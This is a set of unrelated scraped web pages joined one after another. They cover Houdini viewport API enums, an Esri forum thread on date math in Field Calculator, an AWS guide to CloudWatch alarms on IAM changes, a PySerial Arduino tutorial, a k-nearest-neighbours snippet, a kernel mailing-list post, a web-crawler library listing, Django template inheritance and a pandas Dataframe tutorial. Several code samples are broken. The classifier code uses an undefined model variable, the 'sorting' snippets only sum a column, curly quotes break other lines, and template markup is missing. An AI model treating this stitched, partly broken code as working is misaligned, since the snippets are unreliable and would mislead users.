Set represents a group of 3D viewport display options that apply to a particular context of geometry. hou.GeometryViewportSettings Gives access to an handle bound to a viewer state. The reference grid (a.k.a. reference plane) in the scene viewer pane tab. Describes how Houdini should prompt the user to choose geometry in the viewport when creating a new SOP node instance. Represents extra geometry to draw in the viewer alongside user content (for example, as guide geometry). A drawable object to render text in the viewport. Represents a user interface event, such as a mouse press. You can access this object in an event handler to respond to user input. Object containing methods for testing input-device-specific information on a UI event, such as which mouse button was pressed. A mechanism to support interactive dragging operations. Represents a user interface event specific to viewers. Represents the execution context of a Python viewer handle. Represents a dragger usable with Python viewer handles. Class for registering a python viewer handle in Houdini. Describes an interactive state for a viewer pane. Represents the execution context of a Python viewer state. Represents a dragger usable with Python viewer states. Builds a context menu for a viewer state. Contains attributes describing a custom viewer state (tool). Represents a viewport visualizer. hou.ViewportVisualizerType Represents a viewport visualizer type. Enum for viewport boundary overlay. Enumeration of connectivity types. Enum of viewport geometry contexts. hou.drawableGeometryFaceStyle Enumeration used with to specify the style of faces to draw. hou.drawableGeometryLineStyle Enumeration used with to specify the style of lines to draw. Enumeration of Geometry Drawable types. hou.drawableHighlightMode Enumeration used with to specify the highlight mode of a drawable matte. Enumeration used with to specify how to wrap the texture generated when using a ramp color (similar to OpenGL texture settings). Enum values for flipbook antialiasing settings. hou.flipbookMotionBlurBias Enum values used to specify the motion blur subframe range. Enum values for setting the flipbook’s visible object types. hou.geometryViewportEvent Enumeration of the geometry viewport events that can be handled by callback functions. hou.geometryViewportLayout Enumeration of viewport layouts. Enumeration of scene viewer viewport types. Enum for viewport shading modes Enumeration of group list types. hou.handleOrientToNormalAxis Enumeration of handle axes that can be aligned to a geometry normal. Enum of visibility options for marker visualizers. Enumeration of global orientation mode. hou.parameterInterfaceTabType Enum values for selecting a specific parameter source tab in the parameter interface dialog. Enumeration for describing the facing direction of pickable components. Enumeration of methods for modifying selections with new components. Enumeration of pick styles. Enumeration of spaces. Enumeration of selection modes. Enumeration of snapping modes. Enumeration of snapping priority. hou.viewportAgentBoneDeform Enum for deforming agent quality hou.viewportAgentWireframe Enum for agent wireframe mode display Background image view target for the viewport display options hou.viewportClosureSelection Viewport highlight of primitives with selected components Viewport Color Schemes Viewport Depth of Field Bokeh Shape hou.viewportFogHeightMode Viewport fog layer modes Viewport volume fog quality Geometry information display state Enum for grid numbering on viewport grids. Viewport guides Viewport font sizes for visualizer text hou.viewportHandleHighlight Handle highlight size Automatic viewport clip plane adjustment during homing Lighting modes for the viewport hou.viewportMaterialUpdate Enum for the update frequency of viewport material assignments hou.viewportPackedBoxMode Enum for the culled packed geometry display mode. hou.viewportParticleDisplay Viewport display option for particle display visualization. hou.viewportShadowQuality The quality of shadows produced in the viewport hou.viewportStandInGeometry Replacement geometry for instances culled in the viewport. Stereoscopic viewport display modes Enum for the viewport texture bit depth limit Transparency rendering quality for the viewport hou.viewportVisualizerCategory Enumeration of the different categories of viewport visualizers. hou.viewportVisualizerScope Enumeration of the different scopes of viewport visualizers. Module containing viewport visualizer functionality. hou.viewportVolumeQuality Display options for viewport volume rendering quality Viewport Prompt Message Type Scene Graph Selection Mask Enumeration of Web Server verbosity level.
https://www.sidefx.com/docs/houdini/hom/hou/rampParmType.html
CC-MAIN-2021-31
en
refinedweb
Good afternoon all! I am trying to automate date calculations using the field calculator in ArcGIS Pro. I have defined survey dates, which I would like to use to create a reinspection dates. The reinspection date is 1 year for high risk zones, 3 years for medium risk zone and 5 years for low risk zones. Is there a piece of code I could use in the field calculator to automate this calculation? The best sample I came out with for high risk zones is: Expression: arcpy.time.ParseDateTimeString(!SurveyDate!) + datetime.timedelta(days=365) However, this did not work when I tried to execute the script. Any help is appreciated. Thank you Solved! Go to Solution.) Thank you for your help, that has worked. I just need to create an 'if' statement now. Is one able to loop the statement in the field calculator whenever a new entry is created? Not sure what you mean by looping the statement in the field calculator. Calculate field will perform the operation on all (or selected) records once. If you want it to do multiple things when you run calculate field, you'll have to code that logic; possibly using an if statement. If you want to automatically do something when a condition is met (new record, new value, etc), that would be something different. Maybe look into Attribute Assistant or Attribute Rules. If it's in an RDBMS, you could make a database trigger. Or if it doesn't need to be immediate, you could schedule a Python script as a Windows task. You say it did not work but what was the result? No values? Incorrect values? Error message? In the case of an error, what was the complete message (check the geoprocessing results)? If you're working with the datetime library, you'll need to import datetime Try something like this for the Python code block def calc_reinspection(survey_date): date_str_format = "%d/%m/%Y" survey_date = datetime.datetime.strptime(survey_date, date_str_format) reinspection_date = survey_date + datetime.timedelta(days=365) return datetime.datetime.strftime(reinspection_date, date_str_format) That last line is formatting the datetime object back to a string formatted date to exclude the time portion (which defaults to midnight). You can leave that part out if you don't mind your dates all having the time displayed (even though they do have it hidden); just return reinspection_date. And this for the Python expression: calc_reinspection(!SurveyDate!) Hi Blake - Thank you for your response. I am now trying to add in the risk zones and my statement does not seem to be working. Field Calculator: Expression line: reclass(!SurveyDate!) Code block: def reclass(SurveyDate): if (RiskZone = LOW): return "SurveyDate + datetime.timedelta(days=486)" elif (RiskZone = MED): return return "SurveyDate + datetime.timedelta(days=1095)" elif (RiskZone = HIGH): return return "SurveyDate + datetime.timedelta(days=1825)" Attached is the syntax error. Any assistance is appreciated. Thank you That error is because you are using a single = which is for assignment. Use double == for comparing equality. And you probably want quotes around the LOW value to indicate it's a string and not a variable that isn't defined. if (RiskZone == "LOW"): Also, get rid of the double return keywords; just one will do 😉 Thank you 😊
https://community.esri.com/t5/python-questions/automating-date-calculations-in-field-calculator/m-p/1068518
CC-MAIN-2021-31
en
refinedweb
Python Serial Communication Updated: Apr 16 Learn how to use the open source and free PySerial library to send and receive data from your Python program via Serial communication. [Disclaimer: As an Amazon Associate I earn from qualifying purchases from paid links in this article] Introduction Python is a vey powerful language because of its ease of use, wide adoption, support community, and increased use in data science and scientific endeavors. So it is a tremendous advantage to be able to unleash the power of Python on our physical devices. In order to do this we need way of communication from our Python programs to our microcontrollers -- so we use Serial Communication. For a walkthrough on how to communicate via Serial Line from the language Processing, see Serial Communication with Processing Tutorial. This tutorial will show examples of how to send and receive data from Python over the serial port. we will be sending actual string literals, as well as variables (more useful). Parts List Arduino UNO (1) Anaconda Installation with Python 3.8 LED (1) 330 Ohm Resistor (1) Jumper Cables (assorted) The Project We are going to run Python on our computer and send numerical data to our Arduino to control the brightness of an LED. Physical Interface The Arduino circuit is shown to the left . This circuit is very simple because the purpose of this tutorial is just to demonstrate basic Serial communication with the use of an LED. Below is the fritzing breadboard diagram. Overall it's pretty self-explanatory, except that the single resistor used was 330 ohms. This is the code to execute in the Arduino IDE: const int analogOutPin = 9; int ledBrightness = 0; void setup() { // initialize serial communications at 9600 bps: Serial.begin(9600); } void loop() { // Update brightness of LED analogWrite(analogOutPin, ledBrightness); delay(2); // Read data from Serial line if (Serial.available() > 0) { ledBrightness = Serial.parseInt(); } } Python Interface 1. First we need to install and import the pySerial library: conda install pyserial import serial 2. Initialize the port for serial communication: ComPort = serial.Serial('COM4') # open COM4 ComPort.baudrate = 9600 # set Baud rate to 9600 The value of the port may be different for you, it must be changed to the name of the port you are using in your Arduino sketch (i.e. 'COM3', 'COM5', etc.) Here is how to figure out the port for you Arduino: AFTER the Arduino is already connected to you computer, go to the Tools menu and see which port is specified. In the image to the left we can see "COM4 (Arduino Uno)", which means we need to communicate with "COM4". 3. Here is an example of sending a string literal via Serial line: ComPort.write(b'100') In the above we are specifying that the value is being sent as a byte, as denoted by the prefix b. After executing this line of code above along with your Arduino circuit hooked up, you should now see that the LED has turned on, and it has been set to a brightness of 100 out of 255. Before After 4. Here is an an example of sending a value by variable to the Serial monitor. This will cause the LED connected to the Arduino to be set to a random brightness, which is stored in the variable s and then used in ComPort.write(s). import random s = str(random.randrange(50,100)).encode() ComPort.write(s) In the above code we are doing the following: Encode the random value as a String, s. Write the value of s via Serial line. After executing these lines of code above along with your Arduino circuit hooked up, you should see a different brightness each time you run the command. Below is a screenshot of the complete Jupyter notebook with all of the commands in order to follow through with the examples:
https://www.codeiseverywhere.com/post/python-serial-communication
CC-MAIN-2021-31
en
refinedweb
# Am trying to create an intelligent model and from there am trying to predict the system…… import pandas as pd #custom data from sklearn import neighbors #to implement algorithm import numpy as np #numerical processing %matplotlib inline import seaborn #charting special df = pd.DataFrame({“Data_Value_1”: [0.6], “Data_Value_2”: [0.5]}) xtest = df.to_numpy() #create a dataframe with x and y value and reference column…. 3 data… kmeans_Data = pd.DataFrame() kmeans_Data[“Data_Value_1”] = [0.3051, 0.4949,0.6974,0.3769,0.2231,0.341,0.4436,0.5897,0.6308,0.5] kmeans_Data[“Data_Value_2”] = [0.5846,0.2654,0.2615,0.4538,0.4615,0.8308,0.4962,0.3269,0.5346,0.6731] kmeans_Data[“Final_Outcome”] = [“win”,”win”,”win”,”win”,”win”,”loss”,”loss”,”loss”,”loss”,”loss”] kmeans_Data seaborn.lmplot(‘Data_Value_1′,’Data_Value_2’, data = kmeans_Data ,hue = “Final_Outcome”) # to do processing.. we need to convert into numpy array….. X= kmeans_Data [ [ “Data_Value_1″,”Data_Value_2”]].to_numpy() # Processing two dimensional array into a matrix y= np.array(kmeans_Data[“Final_Outcome”]) # Processing or converting into an array of single dimensional #Created the classifier… KmeansClassifier = neighbors.KNeighborsClassifier (3, weights = ‘uniform’) KmeansClassifier #Create model by fitting the classifier and the data KmeansModel = KmeansClassifier.fit(X,y) KmeansModel.score(X,y) # We sucucesfully created the model to go ahead….. its time for us to step ahead with the testing part…. #R u ready…. my robot is created with all the validated data…. i need to test my robot whether it is giving output… if i give some #if i give some values to it…. Lets move on…. test_value = np.array([[0.6,0.4]]) # looks like the value is a loss… lets see..whether we are getting the same result… x_test = np.array([[.5,.6]]) Kmeans_trained_model.predict(x_test) Kmeans_trained_model.predict_proba(x_test)
https://www.kaashivinfotech.com/gffdtqweettihbvaewrdygjbvhvghf/
CC-MAIN-2021-31
en
refinedweb
On Tue, 16 Jul 1996, root wrote:> Hello.> I have a question about the stddef.h file in the> ./include/linux directory of v2 kernel, linked to> /usr/include/stddef.h. Since v2.0.0, I have had to make the> following patch to the file or the kernel would not compile,> noting several problems with using wchar_t definitions in the> /usr/include/stdlib.h file. My most recent kernel with this> Am I doing something wrong or is something just messed up??I have similar problem here and posted something on this about 2 weeks ago. The kernel compiles without problems. But other programms sometimes need some help with stddef.h !> > This is the patch I use: diff -u stddef.h stddef.h.sav> --- stddef.h Wed Dec 1 07:44:15 1993> +++ stddef.h.sav Sun Jul 7 01:07:57 1996> @@ -6,6 +6,16 @@> typedef unsigned int size_t;> #endif> > +/*> +#ifdef wchar_t> +#undef wchar_t> +#endif> +*/> +> +#ifndef _WCHAR_T> +typedef unsigned long wchar_t;> +#endif /* _WCHAR_T */> +> #undef NULL> #define NULL ((void *)0)> [big snip]- Sebastian Benoit Save the planet !- [email protected] [email protected] less is more !
https://lkml.org/lkml/1996/7/17/16
CC-MAIN-2021-31
en
refinedweb
AWS Security Blog Logs, Amazon CloudWatch, and Amazon SNS will help make sure no changes to your AWS Identity and Access Management (IAM) configuration are made without you being alerted. In this blog post, we walk through how to set up CloudWatch alarms on IAM configuration changes. Before getting started, make sure you have done the following: - You must have CloudTrail turned on in each of your regions. CloudTrail creates a record of what’s happening in your account and is an essential part of securing your account. - You must already have an SNS topic configured to receive CloudWatch alarms. Refer to the topic by its Amazon Resource Name (ARN) (for example, arn:aws:sns:us-east-1:012345678912:emailalerts). A list of your topics and their ARNs is available from the SNS console. - CloudTrail must have access to an IAM role in your account to be able to send CloudTrail events to your CloudWatch Logs. Make sure you note the log group to which your CloudTrail events are being sent. The default log group is “CloudTrail/DefaultLogGroup.” Here’s a quick overview of how AWS usage ends up triggering a CloudWatch alarm. The users of your AWS account make calls to IAM (and other AWS services), and a record of these calls is included in your CloudTrail logs (these records are called “events”). CloudTrail then assumes the IAM role you created (see #3 above), which allows CloudTrail to publish events to your CloudWatch logs. CloudWatch allows you to run a filter on these events and generate a CloudWatch metric on any matches. It’s up to you to define when these metrics trigger an alarm, but when enough events occur in a specified time period, you will receive an alert either via an SNS topic or email. The following diagram illustrates the process: Use CloudWatch filter patterns Before you configure an alarm, you have to decide what will trigger the alarm. This section includes three filter patterns and explains the IAM use cases to which they apply. More filter patterns—for example, for console sign-in failures, network access control list (ACL) changes, and security group configuration changes—are available in the CloudWatch documentation. Monitor all calls to IAM To monitor all calls to IAM, you can use the following CloudWatch filter pattern: { ($.eventSource = "iam.amazonaws.com") } This filter pattern matches any CloudTrail events for calls to the IAM service. All calls to IAM have a CloudTrail eventSource of iam.amazonaws.com, so any IAM API calls will match this pattern. You will find this simple filter pattern useful if you have minimal IAM activity in your account or to test this blog post. Important: The blank spaces in filter patterns are for clarity. Also, note the use of outer curly brackets and inner parentheses. Monitor changes to IAM If you are interested only in changes to your IAM account, use the following filter pattern: { ( ($.eventSource = "iam.amazonaws.com") && (($.eventName = "Add*") || ($.eventName = "Attach*") || ($.eventName = "Change*") || ($.eventName = "Create*") || ($.eventName = "Deactivate*") || ($.eventName = "Delete*") || ($.eventName = "Detach*") || ($.eventName = "Enable*") || ($.eventName = "Put*") || ($.eventName = "Remove*") || ($.eventName = "Set*") || ($.eventName = "Update*") || ($.eventName = "Upload*")) ) } This filter pattern will only match events from the IAM service that begin with “Add,” “Change,” “Create,” “Deactivate,” “Delete,” “Enable,” “Put,” “Remove,” “Update,” or “Upload.” For more information about why we’re interested in APIs matching these patterns, see the IAM API Reference. Monitor changes to authentication and authorization configuration If you’re interested in changes to your AWS authentication (security credentials) and authorization (policy) configuration, use the following filter pattern: { ( ($.eventSource = "iam.amazonaws.com") && (($.eventName = "Put*Policy") || ($.eventName = "Attach*") || ($.eventName = "Detach*") || ($.eventName = "Create*") || ($.eventName = "Update*") || ($.eventName = "Upload*") || ($.eventName = "Delete*") || ($.eventName = "Remove*") || ($.eventName = "Set*")) ) } This filter pattern matches calls to IAM that modify policy or create, update, upload, and delete IAM elements. Create a CloudWatch metric based on IAM API activity Now, we can set up a CloudWatch metric based on the configuration changes we wish to monitor, and then build a CloudWatch alarm based on that metric: - In the CloudWatch console, click Logs and then select the check box for your CloudTrail log group. (If you are unclear, review your configuration for prerequisite #3 at the beginning of this blog post.) - Click Create Metric Filter. - On the Define Logs Metric Filter screen, click Filter Pattern and enter one of the filter patterns shown above. - Click Test Pattern to see how many of your CloudTrail events will be matched, and then click Show test results to see which events matched. If you’ve only recently enabled your CloudTrail events or you don’t have recent IAM activity, the events may not be available for a few minutes. - When your pattern meets your requirements, click Assign Metric. On the Create Metric Filter and Assign a Metric screen, in the Filter Name box, type a name for the filter, such as IAMAuthnAuthzActivity. - Under Metric Details, in the Metric Namespace box, type a namespace, such as CloudTrailMetrics. - In the Metric Name box, type a name for the metric, such as IAMAuthnAuthzActivity. - Click Show advanced metric settings. - Click Metric Value, and then type 1. This means that each CloudTrail event that matches this filter will contribute a metric of one unit. This is important for configuring the alarm later. - Click Create Filter. The following image shows what the metric configuration looks like in the CloudWatch console for the “Monitor changes to authentication and authorization configuration” filter pattern mentioned previously in this post: Create a CloudWatch alarm for IAM changes After you complete the previous steps, you should see your newly created CloudWatch metric (in our example, we’ve used IAMAuthnAuthzActivity). You can now treat this as any other CloudWatch alarm, so follow these steps to receive a notification when IAM changes are made: - Select Create Alarm (if you are proceeding directly from the previous procedure), or select your newly created metric, and then click Next in the Create Alarm interface. - Give the alarm a name such as IAMAuthnAuthzActivityAlarm. - Set the alarm to trigger when your metric is >= 1 for 1 consecutive period. - Select your notification channel, configured in prerequisite #2 at the beginning of this blog post. - Set the period to 5 Minutes and the statistic to Sum. The following screen shot shows how the alarm appears in the CloudWatch console: Sample alarm When the alarm is triggered, you’ll see an SNS message or email with the following details: Alarm Details: - Name: IAMAuthnAuthzActivityAlarm - State Change: INSUFFICIENT_DATA -> ALARM - Reason for State Change: Threshold Crossed: 1 datapoint (1.0) was greater than or equal to the threshold (1.0). - Timestamp: Monday 26 January, 2015 21:50:52 UTC - AWS Account: 123456789012 Threshold: - The alarm is in the ALARM state when the metric is GreaterThanOrEqualToThreshold 1.0 for 300 seconds. This is your cue to review your CloudTrail logs and figure out who made changes to your account. Ideally, all unexpected changes could be prevented, but monitoring IAM security configuration changes allows you another layer of defense against the unexpected. Create an alarm for IAM events that are important to you, and have a response plan ready for such unexpected situations. If you have questions or feedback about this or any other IAM topic, please visit the IAM forum. – Will
https://aws.amazon.com/blogs/security/how-to-receive-alerts-when-your-iam-configuration-changes/
CC-MAIN-2021-31
en
refinedweb
Multiplies two vectors component-wise. Every component in the result is a component of a multiplied by the same component of b. // Calculate the two vectors generating a result. // This will compute Vector3(2, 6, 12) using UnityEngine; using System.Collections; public class ExampleClass : MonoBehaviour { void Example() { print(Vector3.Scale(new Vector3(1, 2, 3), new Vector3(2, 3, 4))); } } Multiplies every component of this vector by the same component of scale.
https://docs.unity3d.com/kr/2018.2/ScriptReference/Vector3.Scale.html
CC-MAIN-2021-31
en
refinedweb
In this article, we will learn about a very important topic Django Template Inheritance. We’ve already learned what templates in Django are. We’ll carry our knowledge from there and build up on it. What is Django Template Inheritance? Template Inheritance is a method to add all the elements of an HTML file into another without copy-pasting the entire code. For example, consider the Facebook homepage. Here the underlying theme of the web page; background, elements, etc., are same for all FB endpoints There are two ways to achieve this: - Add the same CSS/JS/HTML code all the Endpoint Templates - Or, create a single file containing all common elements and then simply include it in others. The second method is what exactly the Template Inheritance does. Why Inheritance? Just like Facebook, most of the Applications have long HTML codes for a single page itself. Now to write all that again and again for every page is not possible and a very inefficient method. Thus Django provides the method of Template inheritance to ensure more efficiency and less repetition of code. Another significant benefit with Template inheritance is that, if we modify the main file, it will automatically get changed at all places where it was inherited. Thus we don’t need to modify it at all other places Hands-on with Django Template Inheritance Let us create a base HTML file at the project level and then have the Django App templates inherit it. 1) Modify TEMPLATES in settings.py To make the base file accessible, add the following line into TEMPLATES in settings.py as shown in screenshot below. 'DIRS': [os.path.join(BASE_DIR,'django_project/templates')], This line executes the following function: - We get the path of the Django project directory using the predefined variable BASE_DIR (Our Django project folder) - Then with the os module, we join it to the django_project/templates file. We are basically telling Django to search for templates outside the app, at the project level(path indicated by the above code) as well. 2) Coding the Parent Base HTML file Create a template BaseTemplate.html in the Templates folder present at the Django project directory level outside all the Apps. And add the following code into the file: <h2>Basic File Inheritence</h2> {% block <block_name> %} <p> PlaceHolder to be Replaced</p> {% endblock %}: {% extends 'base.html' %} {% block content %} <h3>Welcome to the App</h3><br> {% endblock %} Note: The {% extends ‘base.html’ %} line should always be present at the top of the file. We need to add the template content in a similar Block with the same names as the parent file. The content of the blocks in the base file will be replaced with the corresponding block contents of this file. 4) Creating an App View to display the Template We now just need a View to render and display our App Template. The Code for the View will be simply: from django.shortcuts import render def TemplateView(request): return render(request,'<app_name>/AppTemplate.html(path to the Template)') The URL path for the view: path('template/', TemplateView) Implementing Template Inheritance That’s all with the coding part, let us now implement the Templates in the browser. Run the server and hit the URL You can now continue to create pages with formatting that’s similar to the main template. In our case, that’s base.html. If you add the required CSS, and HTML formatting options to base.html, the same styles will be applied to all templates that inherit the base file. Conclusion That’s it with the Template Inheritance!! See you in the next article!! Till then keep practicing !!
https://www.askpython.com/django/django-template-inheritance
CC-MAIN-2021-31
en
refinedweb
Description. Sukhoi alternatives and similar packages Based on the "Web Crawling" category. Alternatively, view Sukhoi alternatives based on common mentions on social networks and blogs. Scrapy9.9 9.1 L4 Sukhoi VS ScrapyScrapy, a fast high-level web crawling & scraping framework for Python. pyspider9.6 0.6 L3 Sukhoi VS pyspiderA Powerful Spider(Web Crawler) System in Python. requests-html9.2 0.0 Sukhoi VS requests-htmlPythonic HTML Parsing for Humans™ portia9.1 0.0 L2 Sukhoi VS portiaVisual scraping for Scrapy MechanicalSoup7.8 6.1 L4 Sukhoi VS MechanicalSoupA Python library for automating interaction with websites. RoboBrowser7.6 0.0 L4 Sukhoi VS RoboBrowserA simple, Pythonic library for browsing the web without a standalone web browser. cola6.7 0.0 L3 Sukhoi VS colaA high-level distributed crawling framework. PSpider6.6 4.2 Sukhoi VS PSpider简单易用的Python爬虫框架,QQ交流群:597510560 Grab6.6 4.0 L3 Sukhoi VS GrabWeb Scraping Framework Scrapely6.4 0.0 Sukhoi VS ScrapelyA pure-python HTML screen-scraping library gain6.4 0.0 Sukhoi VS gainWeb crawling framework based on asyncio. feedparser5.7 7.4 L3 Sukhoi VS feedparserParse feeds in Python MSpider4.1 0.0 Sukhoi VS MSpiderSpider spidy Web Crawler3.0 0.0 Sukhoi VS spidy Web CrawlerThe simple, easy to use command line web crawler. Crawley2.6 0.0 Sukhoi VS CrawleyPythonic Crawling / Scraping Framework based on Non Blocking I/O operations. brownant2.6 0.0 Sukhoi VS brownantBrownant is a web data extracting framework. Google Search Results in PythonGoogle Search Results via SERP API pip Python Package Demiurge1.9 0.0 L5 Sukhoi VS DemiurgePyQuery-based scraping micro-framework. reader1.8 9.4 Sukhoi VS readerA Python feed reader library. Pomp1.5 0.0 L5 Sukhoi VS PompScreen scraping and web crawling framework FastImage0.9 0.0 L4 Sukhoi VS FastImagePython library that finds the size / type of an image given its URI by fetching as little as needed Mariner0.4 5.6 Sukhoi Sukhoi or a related project? Popular Comparisons README. Features Http/https Support Short learning curve GET/POST Requests Basic AUTH support Modular Support for LXML Support for BeautifulSoup4 Non-blocking I/O Retry Mechanism Basic example The basic example below is equivalent to scrapy's main example although it not only scrapes the author's name but its complete description that stays a layer down from the quotes's pages. Miners inherit from python list class, so they can be used to accumulate data from the pages, they can be placed anywhere too(in this way it is highly flexible to construct json structures for your fetched data.) from sukhoi import MinerLXML, core class AuthorMiner(MinerLXML): def run(self, dom): # The dom object is a struct returned by fromstring. # from lxml.html import fromstring # dom = fromstring(data) # See: # Grab the text for the author description # and accumulate it. elems = dom.xpath("//div[@class='author-description']") self.append(elems[0].text) class QuoteMiner(MinerLXML): def run(self, dom): # Grab all the quotes. elems = dom.xpath("//div[@class='quote']") self.extend(list(map(self.extract_quote, elems))) # Grab the link that points to the next page. next_page = dom.xpath("//li[@class='next']/a[@href][1]") # If there is a next page then flies there to extract # the quotes. if next_page: self.next(next_page[0].get('href')) def extract_quote(self, elem): # Grab the quote text. quote = elem.xpath(".//span[@class='text']")[0].text # Grab the url description. author_url = elem.xpath(".//a[@href][1]")[0].get('href') # Return the desired structure, and tells AuthorMiner to fly # to the url that contains the author description. return {'quote': quote, 'author':AuthorMiner(self.geturl(author_url))} if __name__ == '__main__': URL = '' quotes = QuoteMiner(URL) core.gear.mainloop() # As miners inherit from lists, you end up with # the desired structure containg the quotes and the # author descriptions. print(quotes) The above code would output a json structure like: [{'quote': 'The quote extracted.', 'author': 'The autor description from the about link.'}, ...] Notice the above code differs slightly from main scrapy example because it catches not just the name of the author but the complete description of the author thats found from the link whose text is "about". You can use either EHP or lxml with sukhoi. Sukhoi permits one to split up the parsing into miners in a succint way that permits clean and consistent code. Miners can receive pool objects that are used to accurately construct the desired data structure. The example below scrapes all the tags from by following pagination then makes sure they are unique then scrapes all the quotes from them with their author description. The example below uses EHP to extract the data from the htmls. from sukhoi import MinerEHP, core class AuthorMiner(MinerEHP): def run(self, dom): elem = dom.fst('div', ('class', 'author-description')) self.append(elem.text()) class QuoteMiner(MinerEHP): def run(self, dom): elems = dom.find('div', ('class', 'quote')) self.extend(list(map(self.extract_quote, elems))) elem = dom.fst('li', ('class', 'next')) if elem: self.next(elem.fst('a').attr['href']) def extract_quote(self, elem): quote = elem.fst('span', ('class', 'text')) author_url = elem.fst('a').attr['href'] return {'quote': quote.text(), 'author':AuthorMiner(self.geturl(author_url))} class TagMiner(MinerEHP): acc = set() def run(self, dom): tags = dom.find('a', ('class', 'tag')) self.acc.update([(ind.text(), ind.attr['href']) for ind in tags]) elem = dom.fst('li', ('class', 'next')) if elem: self.next(elem.fst('a').attr['href']) else: self.extract_quotes() def extract_quotes(self): self.extend([(ind[0], QuoteMiner(self.geturl(ind[1]))) for ind in self.acc]) if __name__ == '__main__': URL = '' tags = TagMiner(URL) core.gear.mainloop() print(tags) The structure would look like: [(tag_name, {'quote': 'The quote text.', 'author': "The author description from the about link'}), ...] This other example uses beautifulsoup4 to extract merely the quotes. It follows pagination as well. from sukhoi import MinerBS4, core class QuoteMiner(MinerBS4): def run(self, dom): elems = dom.find_all('div', {'class':'quote'}) self.extend(list(map(self.extract_quote, elems))) elem = dom.find('li', {'class', 'next'}) if elem: self.next(elem.find('a').get('href')) def extract_quote(self, elem): quote = elem.find('span', {'class': 'text'}) return quote.text if __name__ == '__main__': URL = '' quotes = QuoteMiner(URL) core.gear.mainloop() print(quotes) The structure would be: [quote0, quote1, ...] Install Note: Sukhoi would work on python3 only, python2 support was dropped. pip install -r requirements.txt pip install sukhoi
https://python.libhunt.com/sukhoi-alternatives
CC-MAIN-2021-31
en
refinedweb
A Gentle Introduction to Dataframes — Part 1 of 3 Becoming a Data Alchemist — Dataframes …Learning My First Trick Introduction same and or similar tasks in Python. As I continue to gain proficiency, I am beginning to see the power of Python. Certainly, the learning curve for Python is higher than that of Excel, but as I am discovering the effort put forth in learning the “Python way” is paying off in creative flexibility. Before I get “too fancy” with my tutorials I am going to start with the basics. As we continue our journey in becoming data alchemists, I will work to ramp up the sophistication of my spells 😊. In this three-part tutorial, this being part-one, I will introduce you to the Dataframe, a central tool in Python, and what I would consider Pythons version of the Excel Worksheet. I have developed this tutorial as the precursor to part two and three in manner which get progressively more technical. Here I introduce you to the “basic” coding required to get to know and clean data using Dataframes. In part two of this tutorial I introduce more “advanced” techniques for summarizing and formatting analysis with Dataframes and in part three I cover some tips on formatting data using multiple formats in one column. Now lets get started with this tutorial! What is a DataFrame? Like the Excel worksheet, the Dataframe is used to view, clean, and transform data into insights. Essentially think rows and columns, pivot tables, functions etc, all of the functionality you would expect in a worksheet is mostly available in Dataframes. However, unlike Excel worksheets, Dataframes are not visible until you load them with data and display them. Below, I will cover this simple step within my first example, but before showing you that code, I want to give you a preview of the tasks I will be covering in this tutorial. I selected some basics transformations that frequently need to be available prior to performing analysis. Common Data Preparation Tasks Step 1. Loading Your Data — Using Jupyter Notebook # Code snippets shown in grey for easy cutting and pasting import pandas as pd # read file stored in current working directory, using excel file here df_BlogMovieData = pd.read_excel(‘BlogMovieData.xlsx’) df_BlogMovieData Step 2. Cleaning Up Your Data — Finding Nulls, Understanding Data Types, Changing Data Types, and Formatting Data - Checking for Nulls in our columns: df_BlogMovieData.isnull().sum() - Filling Blanks or Nulls columns with 0 # Fill nulls with 0 df_BlogMovieData.fillna(0, inplace=True) - Changing data types if required, and format your numbers to improve comprehension df_BlogMovieData[“Profits”].astype(float) #(float, int,other) df_BlogMovieData.head().style.format({‘ProductionCost’: ‘${:,.0f}’, ‘Domestic_Gross’ : ‘${:,.0f}’,’Foriegn_Gross’ : ‘${:,.0f}’, ‘Worldwide_Gross’ : ‘${:,.0f}’,’Profits’ : ‘${:,.0f}’}) Step 3. Making Changes to the Structure of your Dataframes — Delete Columns, Rename Columns, Combining Columns - Get Column Names df_BlogMovieData.columns - Drop Column Names df_BlogMovieData.drop(‘Profits’, axis=1, inplace = True) - Rename Columns df_BlogMovieData.rename(columns={“studio”: “Movie_Studio”}, inplace = True) - Add Columns & Combine Numbers df_BlogMovieData[‘TotalProfits’] =(df_BlogMovieData[‘Worldwide_Gross’] — df_BlogMovieData[‘ProductionCost’]) - Summing Column TheTotalProfits = df_BlogMovieData[‘TotalProfits’].sum() - Sorting Column TheTotalProfits = df_BlogMovieData[‘TotalProfits’].sum() Step 4. Getting More Advanced — Extracting Data from Dataframe Columns using .apply(Lambda with .split()) Now that you have a sense of the basics, lets look at something a little more advanced but necessary when cleaning data… extracting substrings from larger strings. In python there are several ways this can be done. Below I have shown an intuitive way for the beginner to perform string extraction. In Excel we use — “Left”, “Right” or “Mid”. In Python its not quite that simple. In Python we use a combination of functions “.split()”, “apply()” and something called “Lambda” to access each element in your Dataframe. See the below example showing extracting left, mid, and right using hypothetical characters”~” & “#” for this example. - Sorting Column TheTotalProfits = df_BlogMovieData[‘TotalProfits’].sum() - Get left GetTheLeft = df_BlogMovieData[“MovieTitle”].apply(lambda x: x.split(‘~’)[0] if x.find(“~”) != -1 else None)# Essentially . apply() passes in our element, cell by cell, in the lambda we look for “~”, if it finds it, it splits the string at the “~” and returns a list [0,1] in two parts at locations 0, and 1. The x.split[0] is the first location and returns the string on the left side and passed into our variable. - Get mid GetTheMiddle = df_BlogMovieData[“MovieTitle”].apply(lambda x: x.split(‘~’)[1].split(‘#’)[0] if x.find(“~”) != -1 else None)# similar to above, except here we find if a “~” exists in our string, if so split at “#”, which returns two strings. We access the first string using x.split[0] and the split it again at the “~” but this time instead of grabbing the first location([0]) we grab the second with x.split[1] which is then inserted into our variable. - Get right GetTheRight = df_BlogMovieData[“MovieTitle”].apply(lambda x: x.split(‘#’)[1] if x.find(“~”) != -1 else None)# Similar to left above, except change the character in which we split and access the second position[1] vs. first position in returned variable ([0]). print (GetTheLeft) print (GetTheMiddle) print (GetTheRight) Summary & Final Note Above I covered some of the basics of Dataframes. My aim here and beyond is to provide a gentle introduction to Python in a manner that novices can understand. In future blogs we will get more advanced with material (See (Summarizing data in DataFrames, and Formatting Frustrations with df.describe()). I look forward to seeing you in our next adventure in becoming Data Alchemists! Next Stop — DATA ALCHEMY!
https://rgpihlstrom.medium.com/becoming-a-data-alchemist-dataframes-85b299609b06
CC-MAIN-2021-31
en
refinedweb
